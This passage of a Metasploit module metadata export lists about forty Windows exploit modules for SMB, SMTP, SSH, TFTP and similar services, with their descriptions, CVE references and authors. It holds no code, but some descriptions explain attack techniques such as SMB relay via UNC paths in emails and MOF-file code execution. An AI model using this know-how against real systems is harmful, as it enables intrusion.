OSVDB-11461","hdm " 1062,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms04_007_killbill.rb","exploit","windows/smb/ms04_007_killbill","exploit/windows/smb/ms04_007_killbill","Microsoft ASN.1 Library Bitstring Heap Overflow",100,"This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encounted when using the equivalent bind payloads. Your mileage may vary.","BSD License","t","2004-02-10 00:00:00",0,,"aggressive","t","BID-9633, CVE-2003-0818, MSB-MS04-007, OSVDB-3902, URL-http://www.phreedom.org/solar/exploits/msasn1-bitstring/","Solar Eclipse " 1063,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms04_011_lsass.rb","exploit","windows/smb/ms04_011_lsass","exploit/windows/smb/ms04_011_lsass","Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow",400,"This module exploits a stack buffer overflow in the LSASS service, this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need need to run this module twice. DCERPC request fragmentation can be performed by setting 'FragSize' parameter.","Metasploit Framework License (BSD)","t","2004-04-13 00:00:00",0,,"aggressive","t","BID-10108, CVE-2003-0533, MSB-MS04-011, OSVDB-5248","hdm " 1064,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms04_031_netdde.rb","exploit","windows/smb/ms04_031_netdde","exploit/windows/smb/ms04_031_netdde","Microsoft NetDDE Service Overflow",400,"This module exploits a stack buffer overflow in the NetDDE service, which is the precursor to the DCOM interface. This exploit effects only operating systems released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim that this vulnerability can be exploited without authentication, the NDDEAPI pipe is only accessible after successful authentication.","BSD License","t","2004-10-12 00:00:00",0,,"aggressive","t","BID-11372, CVE-2004-0206, MSB-MS04-031, OSVDB-10689","pusscat " 1065,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms05_039_pnp.rb","exploit","windows/smb/ms05_039_pnp","exploit/windows/smb/ms05_039_pnp","Microsoft Plug and Play Service Overflow",400,"This module exploits a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. NOTE: Since the PnP service runs inside the service.exe process, a failed exploit attempt will cause the system to automatically reboot.","Metasploit Framework License (BSD)","t","2005-08-09 00:00:00",0,,"aggressive","t","BID-14513, CVE-2005-1983, MSB-MS05-039, OSVDB-18605","cazz , hdm " 1066,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb","exploit","windows/smb/ms06_025_rasmans_reg","exploit/windows/smb/ms06_025_rasmans_reg","Microsoft RRAS Service RASMAN Registry Overflow",400,"This module exploits a registry-based stack buffer overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'. Exploiting this flaw involves two distinct steps - creating the registry key and then triggering an overwrite based on a read of this key. Once the key is created, it cannot be recreated. This means that for any given system, you only get one chance to exploit this flaw. Picking the wrong target will require a manual removal of the following registry key before you can try again: HKEY_USERS\.DEFAULT\Software\Microsoft\RAS Phonebook","BSD License","t","2006-06-13 00:00:00",0,,"aggressive","t","BID-18325, CVE-2006-2370, MSB-MS06-025, OSVDB-26437","hdm , pusscat " 1067,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms06_025_rras.rb","exploit","windows/smb/ms06_025_rras","exploit/windows/smb/ms06_025_rras","Microsoft RRAS Service Overflow",200,"This module exploits a stack buffer overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.","Metasploit Framework License (BSD)","t","2006-06-13 00:00:00",,,"aggressive","t","BID-18325, CVE-2006-2370, MSB-MS06-025, OSVDB-26437","Nicolas Pouvesle , hdm " 1068,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms06_040_netapi.rb","exploit","windows/smb/ms06_040_netapi","exploit/windows/smb/ms06_040_netapi","Microsoft Server Service NetpwPathCanonicalize Overflow",400,"This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.","Metasploit Framework License (BSD)","t","2006-08-08 00:00:00",0,,"aggressive","t","BID-19409, CVE-2006-3439, MSB-MS06-040, OSVDB-27845","hdm " 1069,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms06_066_nwapi.rb","exploit","windows/smb/ms06_066_nwapi","exploit/windows/smb/ms06_066_nwapi","Microsoft Services MS06-066 nwapi32.dll Module Exploit",400,"This module exploits a stack buffer overflow in the svchost service when the netware client service is running. This specific vulnerability is in the nwapi32.dll module.","Metasploit Framework License (BSD)","t","2006-11-14 00:00:00",0,,"aggressive","t","BID-21023, CVE-2006-4688, MSB-MS06-066, OSVDB-30260","pusscat " 1070,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms06_066_nwwks.rb","exploit","windows/smb/ms06_066_nwwks","exploit/windows/smb/ms06_066_nwwks","Microsoft Services MS06-066 nwwks.dll Module Exploit",400,"This module exploits a stack buffer overflow in the svchost service, when the netware client service is running. This specific vulnerability is in the nwapi32.dll module.","Metasploit Framework License (BSD)","t","2006-11-14 00:00:00",0,,"aggressive","t","BID-21023, CVE-2006-4688, MSB-MS06-066, OSVDB-30260","pusscat " 1071,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms06_070_wkssvc.rb","exploit","windows/smb/ms06_070_wkssvc","exploit/windows/smb/ms06_070_wkssvc","Microsoft Workstation Service NetpManageIPCConnect Overflow",0,"This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect function using the Workstation service in Windows 2000 SP4 and Windows XP SP2. In order to exploit this vulnerability, you must specify a the name of a valid Windows DOMAIN. It may be possible to satisfy this condition by using a custom dns and ldap setup, however that method is not covered here. Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator credentials are required to reach the vulnerable code. Windows XP SP1 only requires valid user credentials. Also, testing shows that a machine already joined to a domain is not exploitable.","Metasploit Framework License (BSD)","t","2006-11-14 00:00:00",0,,"aggressive","t","BID-20985, CVE-2006-4691, MSB-MS06-070, OSVDB-30263","jduck " 1072,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb","exploit","windows/smb/ms07_029_msdns_zonename","exploit/windows/smb/ms07_029_msdns_zonename","Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)",0,"This module exploits a stack buffer overflow in the RPC interface of the Microsoft DNS service. The vulnerability is triggered when a long zone name parameter is supplied that contains escaped octal strings. This module is capable of bypassing NX/DEP protection on Windows 2003 SP1/SP2. This module exploits the RPC service using the \DNSSERVER pipe available via SMB. This pipe requires a valid user account to access, so the SMBUSER and SMBPASS options must be specified.","Metasploit Framework License (BSD)","t","2007-04-12 00:00:00",0,,"aggressive","t","CVE-2007-1748, MSB-MS07-029, OSVDB-34100, URL-http://www.microsoft.com/technet/security/advisory/935964.mspx","Unknown, hdm " 1073,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms08_067_netapi.rb","exploit","windows/smb/ms08_067_netapi","exploit/windows/smb/ms08_067_netapi","Microsoft Server Service Relative Path Stack Corruption",500,"This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.","Metasploit Framework License (BSD)","t","2008-10-28 00:00:00",0,,"aggressive","t","CVE-2008-4250, MSB-MS08-067, OSVDB-49243, URL-http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos","Brett Moore , hdm , jduck , staylor" 1074,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb","exploit","windows/smb/ms09_050_smb2_negotiate_func_index","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",400,"This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.","Metasploit Framework License (BSD)","t","2009-09-07 00:00:00",0,,"aggressive","t","BID-36299, CVE-2009-3103, MSB-MS09-050, OSVDB-57799, URL-http://seclists.org/fulldisclosure/2009/Sep/0039.html, URL-http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx","Laurent Gaffie , hdm , sf " 1075,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms10_061_spoolss.rb","exploit","windows/smb/ms10_061_spoolss","exploit/windows/smb/ms10_061_spoolss","Microsoft Print Spooler Service Impersonation Vulnerability",600,"This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild.","Metasploit Framework License (BSD)","t","2010-09-14 00:00:00",0,,"aggressive","t","CVE-2010-2729, MSB-MS10-061, OSVDB-67988","hdm , jduck " 1076,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb","exploit","windows/smb/netidentity_xtierrpcpipe","exploit/windows/smb/netidentity_xtierrpcpipe","Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow",500,"This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be able to execute arbitrary code. The success of this module is much greater once the service has been restarted.","Metasploit Framework License (BSD)","t","2009-04-06 00:00:00",0,,"aggressive","t","BID-34400, CVE-2009-1350, OSVDB-53351, URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1","MC , Ruben Santamarta" 1077,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/psexec.rb","exploit","windows/smb/psexec","exploit/windows/smb/psexec","Microsoft Windows Authenticated User Code Execution",0,"This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the ""psexec"" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.","Metasploit Framework License (BSD)","t","1999-01-01 00:00:00",0,,"aggressive","t","CVE-1999-0504, OSVDB-3106, URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx","hdm " 1078,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/smb_relay.rb","exploit","windows/smb/smb_relay","exploit/windows/smb/smb_relay","Microsoft Windows SMB Relay Code Execution",600,"This module will relay SMB authentication requests to another host, gaining access to an authenticated SMB session if successful. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate. Unfortunately, this module is not able to clean up after itself. The service and payload file listed in the output will need to be manually removed after access has been gained. The service created by this tool uses a randomly chosen name and description, so the services list can become cluttered after repeated exploitation. The SMB authentication relay attack was first reported by Sir Dystic on March 31st, 2001 at @lanta.con in Atlanta, Georgia. On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin includes a patch which prevents the relaying of challenge keys back to the host which issued them, preventing this exploit from working in the default configuration. It is still possible to set the SMBHOST parameter to a third-party host that the victim is authorized to access, but the ""reflection"" attack has been effectively broken.","Metasploit Framework License (BSD)","t","2001-03-31 00:00:00",0,,"passive","t","CVE-2008-4037, MSB-MS08-068, OSVDB-49736, URL-http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx, URL-http://en.wikipedia.org/wiki/SMBRelay, URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx, URL-http://www.xfocus.net/articles/200305/smbrelay.html","hdm " 1079,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb","exploit","windows/smb/timbuktu_plughntcommand_bof","exploit/windows/smb/timbuktu_plughntcommand_bof","Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow",500,"This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6 in a pretty novel way. This exploit requires two connections. The first connection is used to leak stack data using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying a large value for this argument it is possible to cause Timbuktu to reply to the initial request with leaked stack data. Using this data allows for reliable exploitation of the buffer overflow vulnerability. Props to Infamous41d for helping in finding this exploitation path. The second connection utilizes the data from the data leak to accurately exploit the stack based buffer overflow vulnerability. TODO: hdm suggested using meterpreter's migration capability and restarting the process for multishot exploitation.","Metasploit Framework License (BSD)","t","2009-06-25 00:00:00",0,,"aggressive","t","BID-35496, CVE-2009-1394, OSVDB-55436, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809","bannedit " 1080,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb","exploit","windows/smtp/mailcarrier_smtp_ehlo","exploit/windows/smtp/mailcarrier_smtp_ehlo","TABS MailCarrier v2.51 SMTP EHLO Overflow",400,"This module exploits the MailCarrier v2.51 suite SMTP service. The stack is overwritten when sending an overly long EHLO command.","Metasploit Framework License (BSD)","t","2004-10-26 00:00:00",0,,"aggressive","t","BID-11535, CVE-2004-1638, EDB-598, OSVDB-11174","patrick " 1081,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smtp/mercury_cram_md5.rb","exploit","windows/smtp/mercury_cram_md5","exploit/windows/smtp/mercury_cram_md5","Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow",500,"This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51. By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-08-18 00:00:00",0,,"aggressive","t","BID-25357, CVE-2007-4440, OSVDB-39669","MC " 1082,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb","exploit","windows/smtp/ms03_046_exchange2000_xexch50","exploit/windows/smtp/ms03_046_exchange2000_xexch50","MS03-046 Exchange 2000 XEXCH50 Heap Overflow",400,"This is an exploit for the Exchange 2000 heap overflow. Due to the nature of the vulnerability, this exploit is not very reliable. This module has been tested against Exchange 2000 SP0 and SP3 running a Windows 2000 system patched to SP4. It normally takes between one and 100 connection attempts to successfully obtain a shell. This exploit is *very* unreliable.","Metasploit Framework License (BSD)","t","2003-10-15 00:00:00",0,,"aggressive","t","BID-8838, CVE-2003-0714, EDB-113, MSB-MS03-046, OSVDB-2674","hdm , patrick " 1083,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smtp/njstar_smtp_bof.rb","exploit","windows/smtp/njstar_smtp_bof","exploit/windows/smtp/njstar_smtp_bof","NJStar Communicator 3.00 MiniSMTP Buffer Overflow",300,"This module exploits a stack buffer overflow vulnerability in NJStar Communicator Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple NJStar products, and will continue to run in the background even if the software is already shutdown. According to the vendor's testimonials, NJStar software is also used by well known companies such as Siemens, NEC, Google, Yahoo, eBay; government agencies such as the FBI, Department of Justice (HK); as well as a long list of universities such as Yale, Harvard, University of Tokyo, etc.","Metasploit Framework License (BSD)","f","2011-10-31 00:00:00",0,,"aggressive","t","CVE-2011-4040, EDB-18057, OSVDB-76728, URL-http://www.njstar.com/cms/njstar-communicator","Dillon Beresford" 1084,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smtp/wmailserver.rb","exploit","windows/smtp/wmailserver","exploit/windows/smtp/wmailserver","SoftiaCom WMailserver 1.0 Buffer Overflow",200,"This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0 (SMTP) via a SEH frame overwrite.","Metasploit Framework License (BSD)","t","2005-07-11 00:00:00",0,,"aggressive","t","BID-14213, CVE-2005-2287, OSVDB-17883","MC " 1085,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smtp/ypops_overflow1.rb","exploit","windows/smtp/ypops_overflow1","exploit/windows/smtp/ypops_overflow1","YPOPS 0.6 Buffer Overflow",200,"This module exploits a stack buffer overflow in the YPOPS POP3 service. This is a classic stack buffer overflow for YPOPS version 0.6. Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to jmp ebx opcode in ws_32.dll","Metasploit Framework License (BSD)","f","2004-09-27 00:00:00",,,"aggressive","t","BID-11256, CVE-2004-1558, OSVDB-10367, URL-http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html","acaro " 1086,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssh/freeftpd_key_exchange.rb","exploit","windows/ssh/freeftpd_key_exchange","exploit/windows/ssh/freeftpd_key_exchange","FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow",200,"This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10 This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client. This module is based on MC's freesshd_key_exchange exploit.","BSD License","t","2006-05-12 00:00:00",0,,"aggressive","t","BID-17958, CVE-2006-2407, OSVDB-25569","riaf " 1087,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssh/freesshd_authbypass.rb","exploit","windows/ssh/freesshd_authbypass","exploit/windows/ssh/freesshd_authbypass","Freesshd Authentication Bypass",600,"This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.","Metasploit Framework License (BSD)","t","2010-08-11 00:00:00",0,,"aggressive","t","BID-56785, CVE-2012-6066, OSVDB-88006, URL-http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html, URL-http://seclists.org/fulldisclosure/2010/Aug/132","Aris, Daniele Martini , kcope" 1088,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssh/freesshd_key_exchange.rb","exploit","windows/ssh/freesshd_key_exchange","exploit/windows/ssh/freesshd_key_exchange","FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow",200,"This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9. This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client.","Metasploit Framework License (BSD)","t","2006-05-12 00:00:00",0,,"aggressive","t","BID-17958, CVE-2006-2407, OSVDB-25463","MC " 1089,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssh/putty_msg_debug.rb","exploit","windows/ssh/putty_msg_debug","exploit/windows/ssh/putty_msg_debug","PuTTy.exe <= v0.53 Buffer Overflow",300,"This module exploits a buffer overflow in the PuTTY SSH client that is triggered through a validation error in SSH.c.","Metasploit Framework License (BSD)","f","2002-12-16 00:00:00",0,,"passive","t","BID-6407, CVE-2002-1359, OSVDB-8044, URL-http://www.rapid7.com/advisories/R7-0009.html","MC " 1090,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssh/securecrt_ssh1.rb","exploit","windows/ssh/securecrt_ssh1","exploit/windows/ssh/securecrt_ssh1","SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow",200,"This module exploits a buffer overflow in SecureCRT <= 4.0 Beta 2. By sending a vulnerable client an overly long SSH1 protocol identifier string, it is possible to execute arbitrary code. This module has only been tested on SecureCRT 3.4.4.","Metasploit Framework License (BSD)","f","2002-07-23 00:00:00",0,,"passive","t","BID-5287, CVE-2002-1059, OSVDB-4991","MC " 1091,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssh/sysax_ssh_username.rb","exploit","windows/ssh/sysax_ssh_username","exploit/windows/ssh/sysax_ssh_username","Sysax 5.53 SSH Username Buffer Overflow",300,"This module exploits a vulnerability found in Sysax's SSH service. By supplying a long username, the SSH server will copy that data on the stack without proper bounds checking, therefore allowing remote code execution under the context of the user. Please note that previous versions (before 5.53) are also affected by this bug.","Metasploit Framework License (BSD)","f","2012-02-27 00:00:00",0,,"aggressive","t","EDB-18535, OSVDB-79689, URL-http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html","Craig Freyman, sinn3r " 1092,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssl/ms04_011_pct.rb","exploit","windows/ssl/ms04_011_pct","exploit/windows/ssl/ms04_011_pct","Microsoft Private Communications Transport Overflow",200,"This module exploits a buffer overflow in the Microsoft Windows SSL PCT protocol stack. This code is based on Johnny Cyberpunk's THC release and has been tested against Windows 2000 and Windows XP. To use this module, specify the remote port of any SSL service, or the port and protocol of an application that uses SSL. The only application protocol supported at this time is SMTP. You only have one chance to select the correct target, if you are attacking IIS, you may want to try one of the other exploits first (WebDAV). If WebDAV does not work, this more than likely means that this is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS 5.1). Using the wrong target may not result in an immediate crash of the remote system.","Metasploit Framework License (BSD)","t","2004-04-13 00:00:00",0,,"aggressive","t","BID-10116, CVE-2003-0719, MSB-MS04-011, OSVDB-5250","hdm " 1093,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb","exploit","windows/telnet/gamsoft_telsrv_username","exploit/windows/telnet/gamsoft_telsrv_username","GAMSoft TelSrv 1.5 Username Buffer Overflow",200,"This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5. Other versions may also be affected. The service terminates after exploitation, so you only get one chance!","Metasploit Framework License (BSD)","f","2000-07-17 00:00:00",0,,"aggressive","t","BID-1478, CVE-2000-0665, OSVDB-373, URL-http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip","patrick " 1094,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/telnet/goodtech_telnet.rb","exploit","windows/telnet/goodtech_telnet","exploit/windows/telnet/goodtech_telnet","GoodTech Telnet Server <= 5.0.6 Buffer Overflow",200,"This module exploits a stack buffer overflow in GoodTech Systems Telnet Server versions prior to 5.0.7. By sending an overly long string, an attacker can overwrite the buffer and control program execution.","Metasploit Framework License (BSD)","t","2005-03-15 00:00:00",0,,"aggressive","t","BID-12815, CVE-2005-0768, OSVDB-14806","MC " 1095,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/attftp_long_filename.rb","exploit","windows/tftp/attftp_long_filename","exploit/windows/tftp/attftp_long_filename","Allied Telesyn TFTP Server 1.9 Long Filename Overflow",200,"This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name.","Metasploit Framework License (BSD)","f","2006-11-27 00:00:00",,,"aggressive","t","BID-21320, CVE-2006-6184, EDB-2887, OSVDB-11350, URL-ftp://guest:guest@ftp.alliedtelesyn.co.uk/pub/utilities/at-tftpd19.zip","patrick " 1096,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/distinct_tftp_traversal.rb","exploit","windows/tftp/distinct_tftp_traversal","exploit/windows/tftp/distinct_tftp_traversal","Distinct TFTP 3.10 Writable Directory Traversal Execution",600,"This module exploits a vulnerability found in Distinct TFTP server. The software contains a directory traversal vulnerability that allows a remote attacker to write arbitrary file to the file system, which results in code execution under the context of 'SYSTEM'.","Metasploit Framework License (BSD)","f","2012-04-08 00:00:00",0,,"aggressive","t","EDB-18718, OSVDB-80984, URL-http://www.spentera.com/advisories/2012/SPN-01-2012.pdf","modpr0be, sinn3r " 1097,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/dlink_long_filename.rb","exploit","windows/tftp/dlink_long_filename","exploit/windows/tftp/dlink_long_filename","D-Link TFTP 1.0 Long Filename Buffer Overflow",400,"This module exploits a stack buffer overflow in D-Link TFTP 1.0. By sending a request for an overly long file name, an attacker could overflow a buffer and execute arbitrary code. For best results, use bind payloads with nonx (No NX).","Metasploit Framework License (BSD)","f","2007-03-12 00:00:00",0,,"aggressive","t","BID-22923, CVE-2007-1435, OSVDB-33977","LSO , patrick " 1098,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/futuresoft_transfermode.rb","exploit","windows/tftp/futuresoft_transfermode","exploit/windows/tftp/futuresoft_transfermode","FutureSoft TFTP Server 2000 Transfer-Mode Overflow",200,"This module exploits a stack buffer overflow in the FutureSoft TFTP Server 2000 product. By sending an overly long transfer-mode string, we were able to overwrite both the SEH and the saved EIP. A subsequent write-exception that will occur allows the transferring of execution to our shellcode via the overwritten SEH. This module has been tested against Windows 2000 Professional and for some reason does not seem to work against Windows 2000 Server (could not trigger the overflow at all).","Metasploit Framework License (BSD)","t","2005-05-31 00:00:00",,,"aggressive","t","BID-13821, CVE-2005-1812, OSVDB-16954, URL-http://www.security.org.sg/vuln/tftp2000-1001.html","MC " 1099,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb","exploit","windows/tftp/netdecision_tftp_traversal","exploit/windows/tftp/netdecision_tftp_traversal","NetDecision 4.2 TFTP Writable Directory Traversal Execution",600,"This module exploits a vulnerability found in NetDecision 4.2 TFTP server. The software contains a directory traversal vulnerability that allows a remote attacker to write arbitrary file to the file system, which results in code execution under the context of user executing the TFTP Server.","Metasploit Framework License (BSD)","f","2009-05-16 00:00:00",0,,"aggressive","t","BID-35002, CVE-2009-1730, OSVDB-54607","Rob Kraus, juan vazquez " 1100,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/opentftp_error_code.rb","exploit","windows/tftp/opentftp_error_code","exploit/windows/tftp/opentftp_error_code","OpenTFTP SP 1.4 Error Packet Overflow",200,"This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable condition triggers when the TFTP opcode is configured as an error packet, the TFTP service will then format the message using a sprintf() function, which causes an overflow, therefore allowing remote code execution under the context of SYSTEM. The offset (to EIP) is specific to how the TFTP was started (as a 'Stand Alone', or 'Service'). By default the target is set to 'Service' because that's the default configuration during OpenTFTP Server SP 1.4's installation.","Metasploit Framework License (BSD)","f","2008-07-05 00:00:00",0,,"aggressive","t","BID-29111, CVE-2008-2161, OSVDB-44904, URL-http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl","steponequit, tixxDZ" 1101,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb","exploit","windows/tftp/quick_tftp_pro_mode","exploit/windows/tftp/quick_tftp_pro_mode","Quick FTP Pro 2.1 Transfer-Mode Overflow",400,"This module exploits a stack buffer overflow in the Quick TFTP Pro server product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting in a DoS. This is a port of a sploit by Mati ""muts"" Aharoni.","Metasploit Framework License (BSD)","f","2008-03-27 00:00:00",1,,"aggressive","t","BID-28459, CVE-2008-1610, OSVDB-43784, URL-http://secunia.com/advisories/29494","Saint Patrick" 1102,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/tftpd32_long_filename.rb","exploit","windows/tftp/tftpd32_long_filename","exploit/windows/tftp/tftpd32_long_filename","TFTPD32 <= 2.21 Long Filename Buffer Overflow",200,"This module exploits a stack buffer overflow in TFTPD32 version 2.21 and prior. By sending a request for an overly long file name to the tftpd32 server, a remote attacker could overflow a buffer and execute arbitrary code on the system.","Metasploit Framework License (BSD)","t","2002-11-19 00:00:00",,,"aggressive","t","BID-6199, CVE-2002-2226, OSVDB-45903","MC " 